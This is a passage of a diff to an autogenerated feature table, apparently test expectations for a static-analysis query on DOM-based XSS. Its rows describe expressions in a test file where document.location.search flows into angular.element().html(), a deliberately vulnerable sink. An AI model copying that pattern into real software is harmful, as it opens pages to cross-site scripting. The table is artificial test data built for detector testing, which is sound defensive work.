    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:89:27 | this | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:89:27 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | 'arguments' object of anonymous function | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | 'arguments' object of anonymous function | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | exceptional return of anonymous function | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | exceptional return of anonymous function | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | functio ... K\\n } | CalleeFlexibleAccessPath | angular.module().service().service | | autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | functio ... K\\n } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | functio ... K\\n } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | functio ... K\\n } | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | functio ... K\\n } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | return of anonymous function | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | return of anonymous function | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:92:5 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:15 | angular | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:15 | angular | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:15 | angular | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:15 | angular | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:15 | angular | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:23 | angular.element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:23 | angular.element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:23 | angular.element | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:23 | angular.element | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:23 | angular.element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | angular ...
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | angular ...
    ') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | angular ...
    ') | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | angular ...
    ') | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | angular ...
    ') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | exceptional return of angular ...
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | exceptional return of angular ...
    ') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | exceptional return of angular ...
    ') | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | exceptional return of angular ...
    ') | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:32 | exceptional return of angular ...
    ') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:37 | angular ... ').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:37 | angular ... ').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:37 | angular ... ').html | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:37 | angular ... ').html | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:37 | angular ... ').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | angular ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | angular ... search) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | angular ... search) | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | angular ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | angular ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | exceptional return of angular ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | exceptional return of angular ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | exceptional return of angular ... search) | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | exceptional return of angular ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:9:90:63 | exceptional return of angular ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:17:90:23 | element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:17:90:23 | element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:17:90:23 | element | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:17:90:23 | element | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:17:90:23 | element | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:90:25:90:31 | '
    ' | CalleeFlexibleAccessPath | angular.element | | autogenerated/Xss/DomBasedXss/tst.js:90:25:90:31 | '
    ' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:90:25:90:31 | '
    ' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16357,6 +113947,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:90:25:90:31 | '
    ' | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:90:25:90:31 | '
    ' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:90:25:90:31 | '
    ' | receiverName | angular | +| autogenerated/Xss/DomBasedXss/tst.js:90:34:90:37 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:34:90:37 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:34:90:37 | html | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:34:90:37 | html | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:34:90:37 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:46 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:46 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:46 | document | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:46 | document | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:46 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:55 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:55 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:55 | document.location | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:55 | document.location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:39:90:55 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:90:39:90:62 | documen ... .search | CalleeFlexibleAccessPath | angular.element().html | | autogenerated/Xss/DomBasedXss/tst.js:90:39:90:62 | documen ... .search | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:90:39:90:62 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16364,6 +113969,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:90:39:90:62 | documen ... .search | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | | autogenerated/Xss/DomBasedXss/tst.js:90:39:90:62 | documen ... .search | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:90:39:90:62 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:48:90:55 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:48:90:55 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:48:90:55 | location | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:48:90:55 | location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:48:90:55 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:90:57:90:62 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:90:57:90:62 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:90:57:90:62 | search | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:90:57:90:62 | search | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:90:57:90:62 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:15 | angular | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:15 | angular | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:15 | angular | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:15 | angular | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:15 | angular | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:23 | angular.element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:23 | angular.element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:23 | angular.element | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:23 | angular.element | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:23 | angular.element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | angular ...
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | angular ...
    ') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | angular ...
    ') | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | angular ...
    ') | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | angular ...
    ') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | exceptional return of angular ...
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | exceptional return of angular ...
    ') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | exceptional return of angular ...
    ') | enclosingFunctionBody | angular element
    html document location search angular element
